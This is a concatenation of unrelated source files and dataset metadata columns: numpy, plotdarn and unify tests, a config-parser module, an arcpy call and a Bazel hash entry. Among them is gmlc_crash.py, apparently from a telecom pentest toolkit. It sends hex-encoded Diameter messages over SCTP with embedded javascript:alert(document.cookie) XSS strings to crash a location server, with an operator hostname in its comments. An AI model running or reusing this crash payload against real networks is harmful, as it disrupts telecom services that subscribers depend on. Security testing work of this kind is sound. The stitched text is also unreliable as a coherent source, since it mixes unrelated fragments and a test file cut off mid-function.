data_inputs_3d, expected_outputs_3d = _create_data_source((10, 10, 2))
data_inputs_2d, expected_outputs_2d = _create_data_source((10, 10))
data_inputs_1d, expected_outputs_1d = _create_data_source((10,))
data_container_1d = DACT(data_inputs=data_inputs_1d, expected_outputs=expected_outputs_1d)
data_container_2d = DACT(data_inputs=data_inputs_2d, expected_outputs=expected_outputs_2d)
data_container = DACT(data_inputs=data_inputs_3d, expected_outputs=expected_outputs_3d)
zip_data_container = ZipDataContainer.create_from(data_container, data_container_2d, data_container_1d)
assert zip_data_container.ids == data_container.ids
for i, di in enumerate(zip_data_container.data_inputs):
assert np.array_equal(di[0], data_inputs_3d[i])
assert np.array_equal(di[1], data_inputs_2d[i])
def test_zip_data_container_should_concatenate_inner_features():
data_inputs_3d, expected_outputs_3d = _create_data_source((10, 10, 2))
data_inputs_2d, expected_outputs_2d = _create_data_source((10, 10))
data_container_2d = DACT(data_inputs=data_inputs_2d, expected_outputs=expected_outputs_2d)
data_container = DACT(data_inputs=data_inputs_3d, expected_outputs=expected_outputs_3d)
zip_data_container = ZipDataContainer.create_from(data_container, data_container_2d)
zip_data_container.concatenate_inner_features()
assert np.array_equal(np.array(zip_data_container.data_inputs)[..., -1], data_container_2d.data_inputs)
assert np.array_equal(np.array(zip_data_container.expected_outputs), expected_outputs_3d)
def _create_data_source(shape):
data_inputs = np.random.random(shape).astype(np.float32)
expected_outputs = np.random.random(shape).astype(np.float32)
return data_inputs, expected_outputs
| 50.328358
| 107
| 0.803084
| 501
| 3,372
| 4.904192
| 0.097804
| 0.21164
| 0.110704
| 0.1221
| 0.899471
| 0.882377
| 0.878307
| 0.836793
| 0.820513
| 0.787139
| 0
| 0.034471
| 0.113879
| 3,372
| 66
| 108
| 51.090909
| 0.787818
| 0
| 0
| 0.659574
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.234043
| 1
| 0.106383
| false
| 0
| 0.042553
| 0
| 0.170213
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
68bdbb59570f4f0d101b0a9879502d39cefedf15
| 2,664
|
py
|
Python
|
gmlc_crash.py
|
SigPloit/S1-X2-tools
|
f2f22c7247663fe0482fe5a9a2941d82eb9674ba
|
[
"Apache-2.0"
] | 1
|
2022-02-07T13:39:55.000Z
|
2022-02-07T13:39:55.000Z
|
gmlc_crash.py
|
SigPloit/S1-X2-tools
|
f2f22c7247663fe0482fe5a9a2941d82eb9674ba
|
[
"Apache-2.0"
] | null | null | null |
gmlc_crash.py
|
SigPloit/S1-X2-tools
|
f2f22c7247663fe0482fe5a9a2941d82eb9674ba
|
[
"Apache-2.0"
] | 1
|
2021-11-01T22:51:15.000Z
|
2021-11-01T22:51:15.000Z
|
#!/usr/bin/env python
import socket
import sctp
import binascii
import sys
import time
#per provare in locale: sudo ncat --sctp -l -p 3868
#source ip 192.168.113.212 #as a MME Client. IP used: IP A
#destination 192.168.113.210 ~IP GMLC
#AVP ORIGIN HOST: pta123_mme.tim.it
#AVP Origin realm: tim.it
#interface 3GPP SLg
#sudo insmod /lib/modules/3.6.11-4.fc16.i686/kernel/lib/libcrc32c.ko
#sudo insmod /lib/modules/3.6.11-4.fc16.i686/kernel/net/sctp/sctp.ko
#echo 1 > /proc/sys/net/sctp/max_init_retransmits
ip = sys.argv[1]
s = sctp.sctpsocket_tcp(socket.AF_INET)
s.connect((str(ip),3868))
s.send(binascii.unhexlify("010000a0800001010000000034d1cff80011779f00000108400000197074613132335f6d6d652e74696d2e6974000000000001284000000e74696d2e697400000000010d0000000b50544100000001014000000e0001c0a871d400000000010a4000000c000028af000001094000000c000028af000001024000000c0100002700000104400000200000010a4000000c000028af000001024000000c01000027"))
time.sleep(1)
# 222015703526741
# 2922107530257614
#frame 16138 pcap gmlc fuzzy
s.send(binascii.unhexlify("010000f8c080000d010000270000002e2b5b406200000108400000197074613132335f6d6d652e74696d2e6974000000000001284000000e74696d2e69740000000001070000005e3c494d472532305352433d272532362532337836613b6176617363253236253233303030303130726970743a612532362532337836633b65727428646f63756d656e742e2532362532337836333b6f6f6b696529273e0000000001150000000c000000010000011b000000373c494d472532305352433d276a6176617363726970743a616c65727428646f63756d656e742e636f6f6b696529273e0000000001000000122623303030303036303b0000"))
time.sleep(10)
#s.send(binascii.unhexlify("010000f8c080000d010000270000002e2b5b406200000108400000197074613132335f6d6d652e74696d2e6974000000000001284000000e74696d2e69740000000001070000005e3c494d472532305352433d272532362532337836613b6176617363253236253233303030303130726970743a612532362532337836633b65727428646f63756d656e742e2532362532337836333b6f6f6b696529273e0000000001150000000c000000010000011b000000373c494d472532305352433d276a6176617363726970743a616c65727428646f63756d656e742e636f6f6b696529273e0000000001000000122623303030303036303b0000"))
#time.sleep(5)
#s.send(binascii.unhexlify("010000f8c080000d010000270000002e2b5b406200000108400000197074613132335f6d6d652e74696d2e6974000000000001284000000e74696d2e69740000000001070000005e3c494d472532305352433d272532362532337836613b6176617363253236253233303030303130726970743a612532362532337836633b65727428646f63756d656e742e2532362532337836333b6f6f6b696529273e0000000001150000000c000000010000011b000000373c494d472532305352433d276a6176617363726970743a616c65727428646f63756d656e742e636f6f6b696529273e0000000001000000122623303030303036303b0000"))
#time.sleep(20)
s.close()
| 76.114286
| 527
| 0.915916
| 155
| 2,664
| 15.709677
| 0.548387
| 0.008214
| 0.021355
| 0.03614
| 0.681314
| 0.681314
| 0.681314
| 0.032033
| 0.032033
| 0.032033
| 0
| 0.67236
| 0.033033
| 2,664
| 34
| 528
| 78.352941
| 0.272904
| 0.585586
| 0
| 0
| 0
| 0
| 0.751381
| 0.751381
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.384615
| 0
| 0.384615
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
ec1fc8bc62df8fff4b2d66b7fad582e61efb74bf
| 36
|
py
|
Python
|
python_in_action/modules/sound/effects/surround.py
|
wang-junjian/learn-python
|
078a260f023b7bd7083132baea7ec0c09d6a2bef
|
[
"MIT"
] | null | null | null |
python_in_action/modules/sound/effects/surround.py
|
wang-junjian/learn-python
|
078a260f023b7bd7083132baea7ec0c09d6a2bef
|
[
"MIT"
] | null | null | null |
python_in_action/modules/sound/effects/surround.py
|
wang-junjian/learn-python
|
078a260f023b7bd7083132baea7ec0c09d6a2bef
|
[
"MIT"
] | null | null | null |
print('sound/effects/surround.py')
| 12
| 34
| 0.75
| 5
| 36
| 5.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.055556
| 36
| 2
| 35
| 18
| 0.794118
| 0
| 0
| 0
| 0
| 0
| 0.714286
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
ec52b6b7bc8084e3a1aa6161a629378a95535a1f
| 161
|
py
|
Python
|
external.py
|
3python/Scripts-in-ArcGIS
|
5a2351bdc4888ecb6fd7667f121bb89909d820c0
|
[
"MIT"
] | null | null | null |
external.py
|
3python/Scripts-in-ArcGIS
|
5a2351bdc4888ecb6fd7667f121bb89909d820c0
|
[
"MIT"
] | null | null | null |
external.py
|
3python/Scripts-in-ArcGIS
|
5a2351bdc4888ecb6fd7667f121bb89909d820c0
|
[
"MIT"
] | null | null | null |
import arcpy
#Convert build.e00 to a coverage file.
arcpy.ImportFromE00_conversion("M:/Python_Advanced/L2/build.e00", "M:/Python_Advanced/L2/", "build2")
| 26.833333
| 102
| 0.745342
| 23
| 161
| 5.086957
| 0.695652
| 0.136752
| 0.25641
| 0.290598
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.062937
| 0.111801
| 161
| 5
| 103
| 32.2
| 0.755245
| 0.229814
| 0
| 0
| 0
| 0
| 0.504274
| 0.452991
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
6be581a6f6777f0f4c42bdba2a2c97ad38d136e3
| 3,086
|
py
|
Python
|
fhconfparser/simpleconf.py
|
FHPythonUtils/FHConfParser
|
c05b12a323c317e43233dcaad472cb9121d911a9
|
[
"MIT"
] | null | null | null |
fhconfparser/simpleconf.py
|
FHPythonUtils/FHConfParser
|
c05b12a323c317e43233dcaad472cb9121d911a9
|
[
"MIT"
] | null | null | null |
fhconfparser/simpleconf.py
|
FHPythonUtils/FHConfParser
|
c05b12a323c317e43233dcaad472cb9121d911a9
|
[
"MIT"
] | null | null | null |
"""SimpleConf works to combine some dictionary of options (likely from argparse)...
with the get method from FHConfParser to provide a very simple solution to enable
a user to extend the capabilities of FHConfParser such that command-line arguments
can be used to override config options
Example use:
```python
import argparse
from fhconfparser import FHConfParser, SimpleConf
parser = argparse.ArgumentParser(argument_default=argparse.SUPPRESS)
parser.add_argument(
"--file",
"-o",
help="Filename to write to (omit for stdout)",
)
...
parser.add_argument(
"--zero",
"-0",
help="Return non zero exit code if an incompatible license is found",
action="store_true",
)
args = vars(parser.parse_args())
# ConfigParser (Parses in the following order: `pyproject.toml`, `setup.cfg`
configparser = FHConfParser()
configparser.parseConfigList(
[("pyproject.toml", "toml"), ("setup.cfg", "ini")],
["tool"],
["tool"],
)
sc = SimpleConf(configparser, "licensecheck", args)
sc.get("zero", False) # Provide the actual default here (used if not provided
# from the command line or through a config file)
```
"""
from __future__ import annotations
from typing import Any
import attr
from .fhconfparser import FHConfParser
@attr.s(auto_attribs=True)
class SimpleConf:
"""SimpleConf works to combine some dictionary of options (likely from argparse)...
with the get method from FHConfParser to provide a very simple solution to enable
a user to extend the capabilities of FHConfParser such that command-line arguments
can be used to override config options
Args:
configParser (FHConfParser): config parser
section (str): section to use
args (dict[str, Any]): some dictionary of commandline args.
eg. vars(parser.parse_args())
Example use:
```python
import argparse
from fhconfparser import FHConfParser, SimpleConf
parser = argparse.ArgumentParser(argument_default=argparse.SUPPRESS)
parser.add_argument(
"--file",
"-o",
help="Filename to write to (omit for stdout)",
)
...
parser.add_argument(
"--zero",
"-0",
help="Return non zero exit code if an incompatible license is found",
action="store_true",
)
args = vars(parser.parse_args())
# ConfigParser (Parses in the following order: `pyproject.toml`, `setup.cfg`
configparser = FHConfParser()
configparser.parseConfigList(
[("pyproject.toml", "toml"), ("setup.cfg", "ini")],
["tool"],
["tool"],
)
sc = SimpleConf(configparser, "licensecheck", args)
sc.get("zero", False) # Provide the actual default here (used if not provided
# from the command line or through a config file)
```
"""
configParser: FHConfParser
section: str
args: dict[str, Any]
def get(self, option: str, fallback: Any | None = None) -> Any:
"""Get an option from the commandline/ the config.
Args:
option (str): option name
fallback (Optional[Any]): value to fallback to. Default=None
Returns:
Any: command-line option or config option
"""
conf = self.configParser.get(self.section, option, fallback)
return self.args[option] if option in self.args else conf
| 26.834783
| 84
| 0.726183
| 410
| 3,086
| 5.426829
| 0.285366
| 0.035955
| 0.030562
| 0.045843
| 0.737079
| 0.737079
| 0.737079
| 0.737079
| 0.737079
| 0.737079
| 0
| 0.000772
| 0.160402
| 3,086
| 114
| 85
| 27.070175
| 0.85797
| 0.925794
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.333333
| 0
| 0.833333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
6be610dd7013ec1938df68e71e5165e62dab9e14
| 118
|
bzl
|
Python
|
debian/rsync.bzl
|
Ewpratten/frc_971_mirror
|
3a8a0c4359f284d29547962c2b4c43d290d8065c
|
[
"BSD-2-Clause"
] | 39
|
2021-06-18T03:22:30.000Z
|
2022-03-21T15:23:43.000Z
|
debian/rsync.bzl
|
Ewpratten/frc_971_mirror
|
3a8a0c4359f284d29547962c2b4c43d290d8065c
|
[
"BSD-2-Clause"
] | 10
|
2021-06-18T03:22:19.000Z
|
2022-03-18T22:14:15.000Z
|
debian/rsync.bzl
|
Ewpratten/frc_971_mirror
|
3a8a0c4359f284d29547962c2b4c43d290d8065c
|
[
"BSD-2-Clause"
] | 4
|
2021-08-19T19:20:04.000Z
|
2022-03-08T07:33:18.000Z
|
files = {
"rsync_3.1.2-1+deb9u2_amd64.deb": "f2987623a6e5b5aedf56e679bedd2e6f7d54cdb4815ac4149c4d135da16ff9c2",
}
| 29.5
| 105
| 0.79661
| 10
| 118
| 9.2
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.407407
| 0.084746
| 118
| 3
| 106
| 39.333333
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0.79661
| 0.79661
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d4079c155c93561cece981d47148c50bd196d84a
| 104
|
py
|
Python
|
sites/nethz/__init__.py
|
GeorgOhneH/ethz-document-fetcher
|
42921e5d71698a269eb54cf9d3979e4a7d88a9cf
|
[
"MIT"
] | 15
|
2020-03-17T15:43:46.000Z
|
2022-01-08T04:23:49.000Z
|
sites/nethz/__init__.py
|
GeorgOhneH/ethz-document-fetcher
|
42921e5d71698a269eb54cf9d3979e4a7d88a9cf
|
[
"MIT"
] | 5
|
2020-03-12T10:05:27.000Z
|
2021-03-03T16:01:47.000Z
|
sites/nethz/__init__.py
|
GeorgOhneH/ethz-document-fetcher
|
42921e5d71698a269eb54cf9d3979e4a7d88a9cf
|
[
"MIT"
] | 2
|
2020-03-17T17:09:20.000Z
|
2020-12-28T22:59:17.000Z
|
from sites.nethz.producer import producer, get_folder_name
from .get_website_url import get_website_url
| 34.666667
| 58
| 0.875
| 17
| 104
| 5
| 0.588235
| 0.235294
| 0.305882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086538
| 104
| 2
| 59
| 52
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d410d1326e3243595f2ec62e1122d56a7cc28191
| 75
|
py
|
Python
|
toolkit/routes/keywords/__init__.py
|
salonimalhotra-ui/seo-audits-toolkit
|
99af8b53dffad45f679eaf06b4a8080df75fcd72
|
[
"MIT"
] | 1
|
2020-12-21T18:21:34.000Z
|
2020-12-21T18:21:34.000Z
|
toolkit/routes/keywords/__init__.py
|
x0rzkov/seo-audits-toolkit
|
29994cbab51bd0697c717b675df3c176096e4f03
|
[
"MIT"
] | null | null | null |
toolkit/routes/keywords/__init__.py
|
x0rzkov/seo-audits-toolkit
|
29994cbab51bd0697c717b675df3c176096e4f03
|
[
"MIT"
] | null | null | null |
import toolkit.routes.keywords.api
import toolkit.routes.keywords.dashboard
| 37.5
| 40
| 0.88
| 10
| 75
| 6.6
| 0.6
| 0.393939
| 0.575758
| 0.818182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.04
| 75
| 2
| 40
| 37.5
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d471ef07a6cf8492006fa2287757ba76d3960154
| 7,786
|
py
|
Python
|
tests/test_convert.py
|
TeriForey/plotdarn
|
638f37ba96d9bfe3705f2d857be20cf2657b4e4e
|
[
"MIT"
] | null | null | null |
tests/test_convert.py
|
TeriForey/plotdarn
|
638f37ba96d9bfe3705f2d857be20cf2657b4e4e
|
[
"MIT"
] | 1
|
2020-07-03T17:39:08.000Z
|
2020-07-03T17:39:08.000Z
|
tests/test_convert.py
|
UniOfLeicester/plotdarn
|
638f37ba96d9bfe3705f2d857be20cf2657b4e4e
|
[
"MIT"
] | null | null | null |
import pytest
from plotdarn import convert
from plotdarn.locations import north_pole
from datetime import datetime
import numpy as np
NP_GLAT = 82.82981033739065
NP_GLON = -84.21565686001807
NP_MLAT = 83.73564264222507
NP_MLON = 169.7596236665287
def test_convert_single():
time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
newloc = convert.loc_mag_to_geo(north_pole, time)
assert newloc.lat == NP_GLAT
assert newloc.lon == NP_GLON
def test_convert_single_not_a_loc():
with pytest.raises(AttributeError):
convert.loc_mag_to_geo([20, 30], "2012-06-15 22:02")
def test_convert_single_not_a_datetime():
time = "2012-06-15 22:02"
res = convert.loc_mag_to_geo(north_pole, time)
assert res.lat == NP_GLAT
assert res.lon == NP_GLON
def test_convert_single_strdate_timezone():
time = "2012-06-15 22:02Z"
res = convert.loc_mag_to_geo(north_pole, time)
assert res.lat == NP_GLAT
assert res.lon == NP_GLON
def test_convert_single_unknown_date():
time = "This can't be a time"
with pytest.raises(ValueError):
convert.loc_mag_to_geo(north_pole, time)
def test_convert_array():
time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
res = convert.arr_mag_to_geo([north_pole.lat], [north_pole.lon], time)
np.testing.assert_array_equal(res, np.array([[NP_GLAT], [NP_GLON]]))
def test_convert_array_2vals():
time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
res = convert.arr_mag_to_geo([north_pole.lat, north_pole.lat], [north_pole.lon, north_pole.lon], time)
expected = np.array(
[
[NP_GLAT, NP_GLAT],
[NP_GLON, NP_GLON]
]
)
np.testing.assert_array_equal(res, expected)
def test_convert_array_np_input():
time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
input_lat = np.array([north_pole.lat, north_pole.lat])
input_lon = np.array([north_pole.lon, north_pole.lon])
res = convert.arr_mag_to_geo(input_lat, input_lon, time)
expected = np.array(
[
[NP_GLAT, NP_GLAT],
[NP_GLON, NP_GLON]
]
)
np.testing.assert_array_equal(res, expected)
def test_convert_array_single_input():
time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
with pytest.raises(TypeError):
convert.arr_mag_to_geo(north_pole.lat, north_pole.lon, time)
def test_convert_array_uneven():
time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
with pytest.raises(ValueError):
convert.arr_mag_to_geo([north_pole.lat, north_pole.lat], [north_pole.lon], time)
def test_convert_array_np_input_shape():
time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
input_lat = np.array([[north_pole.lat], [north_pole.lat]])
input_lon = np.array([[north_pole.lon], [north_pole.lon]])
with pytest.raises(ValueError):
convert.arr_mag_to_geo(input_lat, input_lon, time)
def test_convert_geo_to_mag_loc():
time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
newloc = convert.loc_geo_to_mag(north_pole, time)
assert newloc.lat == NP_MLAT
assert newloc.lon == NP_MLON
def test_convert_single_g2m_not_a_loc():
with pytest.raises(AttributeError):
convert.loc_geo_to_mag([20, 30], "2012-06-15 22:02")
def test_convert_single_g2m_not_a_datetime():
time = "2012-06-15 22:02"
res = convert.loc_geo_to_mag(north_pole, time)
assert res.lat == NP_MLAT
assert res.lon == NP_MLON
def test_convert_single_g2m_strdate_timezone():
time = "2012-06-15 22:02Z"
res = convert.loc_geo_to_mag(north_pole, time)
assert res.lat == NP_MLAT
assert res.lon == NP_MLON
def test_convert_single_g2m_unknown_date():
time = "This can't be a time"
with pytest.raises(ValueError):
convert.loc_geo_to_mag(north_pole, time)
def test_convert_g2m_array():
time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
res = convert.arr_geo_to_mag([north_pole.lat], [north_pole.lon], time)
np.testing.assert_array_equal(res, np.array([[NP_MLAT], [NP_MLON]]))
def test_convert_array_g2m_2vals():
time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
res = convert.arr_geo_to_mag([north_pole.lat, north_pole.lat], [north_pole.lon, north_pole.lon], time)
expected = np.array(
[
[NP_MLAT, NP_MLAT],
[NP_MLON, NP_MLON]
]
)
np.testing.assert_array_equal(res, expected)
def test_convert_array_g2m_np_input():
time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
input_lat = np.array([north_pole.lat, north_pole.lat])
input_lon = np.array([north_pole.lon, north_pole.lon])
res = convert.arr_geo_to_mag(input_lat, input_lon, time)
expected = np.array(
[
[NP_MLAT, NP_MLAT],
[NP_MLON, NP_MLON]
]
)
np.testing.assert_array_equal(res, expected)
def test_convert_array_g2m_single_input():
time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
with pytest.raises(TypeError):
convert.arr_geo_to_mag(north_pole.lat, north_pole.lon, time)
def test_convert_array_g2m_uneven():
time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
with pytest.raises(ValueError):
convert.arr_geo_to_mag([north_pole.lat, north_pole.lat], [north_pole.lon], time)
def test_convert_array_g2m_np_input_shape():
time = datetime(year=2012, month=6, day=15, hour=22, minute=2)
input_lat = np.array([[north_pole.lat], [north_pole.lat]])
input_lon = np.array([[north_pole.lon], [north_pole.lon]])
with pytest.raises(ValueError):
convert.arr_geo_to_mag(input_lat, input_lon, time)
def test_convert_angle_180():
x = 2
y = 2
angle = 180
res = convert.xy_angle_to_origin(x, y, angle)
assert res == 45
def test_convert_angle_minus180():
res = convert.xy_angle_to_origin(2, 2, -180)
assert res == 45
def test_convert_angle_1xy_180():
res = convert.xy_angle_to_origin(1, 1, 180)
assert res == 45
def test_convert_angle_160():
res = convert.xy_angle_to_origin(2, 2, 160)
assert res == 65
def test_convert_angle_minus160():
res = convert.xy_angle_to_origin(2, 2, -160)
assert res == 25
def test_convert_angle_0():
res = convert.xy_angle_to_origin(2, 2, 0)
assert res == 225 # (180 + 45)
def test_convert_left_quad_180():
res = convert.xy_angle_to_origin(-2, 2, 180)
assert res == 135 # 90 + 45
def test_convert_left_quad_160():
res = convert.xy_angle_to_origin(-2, 2, 160)
assert res == 155 # 90 + 65
def test_convert_bottom_left_quad_180():
res = convert.xy_angle_to_origin(-2, -2, 180)
assert res == 225 # 180 + 45
def test_convert_bottom_left_quad_minus160():
res = convert.xy_angle_to_origin(-2, -2, -160)
assert res == 205 # 180 + 25
def test_convert_bottom_left_quad_0():
res = convert.xy_angle_to_origin(-2, -2, 0)
assert res == 45
def test_convert_bottom_right_quad_180():
res = convert.xy_angle_to_origin(2, -2, 180)
assert res == 315 # 180 + 90 + 45
def test_convert_bottom_right_quad_160():
res = convert.xy_angle_to_origin(2, -2, 160)
assert res == 335 # 180 + 90 + 65
def test_convert_bottom_right_quad_minus160():
res = convert.xy_angle_to_origin(2, -2, -160)
assert res == 295 # 180 + 90 + 25
def test_convert_bottom_right_quad_0():
res = convert.xy_angle_to_origin(2, -2, 0)
assert res == 135 # 90 + 45
def test_convert_angle_array():
x = np.array([2, 2, 1])
y = np.array([2, -2, 1])
angle = np.array([180, 180, 0])
res = convert.xy_angle_to_origin(x, y, angle)
np.testing.assert_array_almost_equal(res, np.array([45, 315, 225]))
| 29.381132
| 106
| 0.685975
| 1,254
| 7,786
| 3.949761
| 0.083732
| 0.085403
| 0.10741
| 0.054916
| 0.90955
| 0.888754
| 0.859681
| 0.825358
| 0.776499
| 0.733697
| 0
| 0.081222
| 0.1888
| 7,786
| 264
| 107
| 29.492424
| 0.702977
| 0.012073
| 0
| 0.406417
| 0
| 0
| 0.017964
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 1
| 0.203209
| false
| 0
| 0.026738
| 0
| 0.229947
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2e07ce6f32ff7d86e5b5c905826cf995185762b9
| 41
|
py
|
Python
|
japan_address/__init__.py
|
kzthrk/japan_address
|
91fbbbd7d4654a372ba27501599bba7710796077
|
[
"MIT"
] | null | null | null |
japan_address/__init__.py
|
kzthrk/japan_address
|
91fbbbd7d4654a372ba27501599bba7710796077
|
[
"MIT"
] | null | null | null |
japan_address/__init__.py
|
kzthrk/japan_address
|
91fbbbd7d4654a372ba27501599bba7710796077
|
[
"MIT"
] | null | null | null |
from japan_address.japan_address import *
| 41
| 41
| 0.878049
| 6
| 41
| 5.666667
| 0.666667
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073171
| 41
| 1
| 41
| 41
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2e0a1ae69c776acb2302e78acb924cc421289fa3
| 17,632
|
py
|
Python
|
tests/test_util.py
|
constrict0r/unify
|
18241efc0ac78c796043a798b520304d8b0a6d03
|
[
"MIT"
] | 2
|
2019-08-14T08:51:50.000Z
|
2020-01-27T08:42:35.000Z
|
tests/test_util.py
|
constrict0r/unify
|
18241efc0ac78c796043a798b520304d8b0a6d03
|
[
"MIT"
] | 9
|
2019-09-14T00:29:26.000Z
|
2019-09-14T05:36:32.000Z
|
tests/test_util.py
|
constrict0r/unify
|
18241efc0ac78c796043a798b520304d8b0a6d03
|
[
"MIT"
] | null | null | null |
# Util tests, from root folder run: ./testme.sh.
import pytest
import unittest
@pytest.mark.usefixtures('global_variables')
class util_tests_plugin(unittest.TestCase):
# tests index.
def test_test(self):
tests_list = self.util_var['test_mod'].tests()
assert "user_root" in tests_list
assert "variable_boolean" in tests_list
assert "variable_boolean_true" in tests_list
assert "variable_collection" in tests_list
assert "variable_empty" in tests_list
assert "variable_path" in tests_list
assert "variable_url" in tests_list
assert "variable_url_existent" in tests_list
# user_root.
def test_user_root_with_root(self):
assert self.util_var['test_mod'].user_root('root')
def test_user_root_with_nobody(self):
assert not self.util_var['test_mod'].user_root('nobody')
def test_user_root_with_empty(self):
assert not self.util_var['test_mod'].user_root()
def test_user_root_with_none(self):
assert not self.util_var['test_mod'].user_root(None)
# variable_boolean.
def test_variable_boolean_with_none(self):
assert not self.util_var['test_mod'].variable_boolean(None)
def test_variable_boolean_with_none_string(self):
assert not self.util_var['test_mod'].variable_boolean('None')
def test_variable_boolean_with_null_string(self):
assert not self.util_var['test_mod'].variable_boolean('null')
def test_variable_boolean__with_empty(self):
assert not self.util_var['test_mod'].variable_boolean('')
def test_variable_boolean_with_undefined_string(self):
text = self.util_var['undefined_str']
assert not self.util_var['test_mod'].variable_boolean(text)
def test_variable_boolean_with_embedded_variable(self):
assert not self.util_var['test_mod'].variable_boolean('{{')
def test_variable_boolean_with_empty_collection(self):
assert not self.util_var['test_mod'].variable_boolean('{}')
assert not self.util_var['test_mod'].variable_boolean('[]')
def test_variable_boolean_with_non_empty(self):
assert not self.util_var['test_mod'].variable_boolean('hello')
def test_variable_boolean_with_non_empty_collection(self):
test_dict = self.util_var['test_dict']
test_list = self.util_var['test_list']
assert not self.util_var['test_mod'].variable_boolean(test_dict)
assert not self.util_var['test_mod'].variable_boolean(test_list)
def test_variable_boolean_with_unexistent_path(self):
a_file = self.util_var['unexistent_file']
assert not self.util_var['test_mod'].variable_boolean(a_file)
def test_variable_boolean_with_existent_path(self):
a_file = self.util_var['existent_file']
